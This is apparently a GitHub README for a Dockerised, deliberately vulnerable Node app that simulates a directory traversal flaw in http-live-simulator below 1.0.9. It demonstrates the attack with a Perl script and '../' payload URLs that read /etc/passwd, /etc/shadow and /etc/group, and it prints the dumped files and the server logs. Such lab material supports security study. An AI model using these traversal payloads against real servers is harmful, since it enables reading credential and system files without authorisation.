Skip to content
Branch: master
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
packages
src
.dockerignore
.gitignore
Dockerfile
README.MD
docker-compose.yml
package-lock_json.txt
package_json.txt

README.MD

http-Directory-Traversal-simulator Node 8 web app vulnerable

  • module : http-live-simulator
  • version : < 1.0.9
  • severity: high

Installation using Docker

https://hub.docker.com/_/node/

  • Welcome in https://hub.docker.com/u/nu11secur1ty

  • NOTE: If you want to test, please change package_json.txt to package.json and package-lock_json.txt to package-lock.json

  • Package For Kali Linux

apt install -y docker-compose
  • Start the docker service on Klali Linux
systemctl start docker.service
  • Build
cd http-Directory-Traversal-simulator
docker-compose up --build

Lunch Attack

  • [open the terminal and run the following]

perl cureedjiento.pl
  • Add
http://localhost:8080//../../../../../../etc/your_searching

http://localhost:8080//../../../../../../etc/passwd

  • Output of passwd
root@kali:~/EXPLOITS/CVE-EXPLOIT-DB/CVE-2019-6500/Perl-exploit# perl cureedjiento.pl 
The webpage? example URL:
https://insecure-website.com/loadImage?filename=
or https://domain.some/
or https://domain.some
http://localhost:8080//../../../../../../etc/passwd

 % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                Dload  Upload   Total   Spent    Left  Speed
 0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0curl: (6) Could not resolve host: curl
 % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                Dload  Upload   Total   Spent    Left  Speed
100   958    0   958    0     0   2157      0 --:--:-- --:--:-- --:--:--  2157
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
node:x:1000:1000::/home/node:/bin/bash

http://localhost:8080//../../../../../../etc/shadow

  • Output of shadow
        root@kali:~/EXPLOITS/CVE-EXPLOIT-DB/CVE-2019-6500/Perl-exploit# perl cureedjiento.pl 
The webpage? example URL:
https://insecure-website.com/loadImage?filename=
or https://domain.some/
or https://domain.some
http://localhost:8080//../../../../../../etc/shadow

% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0curl: (6) Could not resolve host: curl
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   527    0   527    0     0   1301      0 --:--:-- --:--:-- --:--:--  1301
root:*:18254:0:99999:7:::
daemon:*:18254:0:99999:7:::
bin:*:18254:0:99999:7:::
sys:*:18254:0:99999:7:::
sync:*:18254:0:99999:7:::
games:*:18254:0:99999:7:::
man:*:18254:0:99999:7:::
lp:*:18254:0:99999:7:::
mail:*:18254:0:99999:7:::
news:*:18254:0:99999:7:::
uucp:*:18254:0:99999:7:::
proxy:*:18254:0:99999:7:::
www-data:*:18254:0:99999:7:::
backup:*:18254:0:99999:7:::
list:*:18254:0:99999:7:::
irc:*:18254:0:99999:7:::
gnats:*:18254:0:99999:7:::
nobody:*:18254:0:99999:7:::
_apt:*:18254:0:99999:7:::
node:!:18258:0:99999:7:::

http://localhost:8080//../../../../../../etc/group

  • Output of group
root@kali:~/EXPLOITS/CVE-EXPLOIT-DB/CVE-2019-6500/Perl-exploit# perl cureedjiento.pl 
The webpage? example URL:
https://insecure-website.com/loadImage?filename=
or https://domain.some/
or https://domain.some
http://localhost:8080//../../../../../../etc/group

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0curl: (6) Could not resolve host: curl
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   470    0   470    0     0   1266      0 --:--:-- --:--:-- --:--:--  1266
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:
audio:x:29:
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
ssh:x:101:
node:x:1000:

  • Analysis: GET parameter is vulnerable
directory-traversal-http-live-simulator | REQUEST:  GET /../../../../../etc/passwd
directory-traversal-http-live-simulator | REQUEST:  GET /../../../../../etc/shadow
directory-traversal-http-live-simulator | REQUEST:  GET /../../../../../etc/group

Uninstall

cd http-simulator
docker-compose rm

IMPORTANT: In this presentation, no one was harmed or lost information! ;)

BR

You can’t perform that action at this time.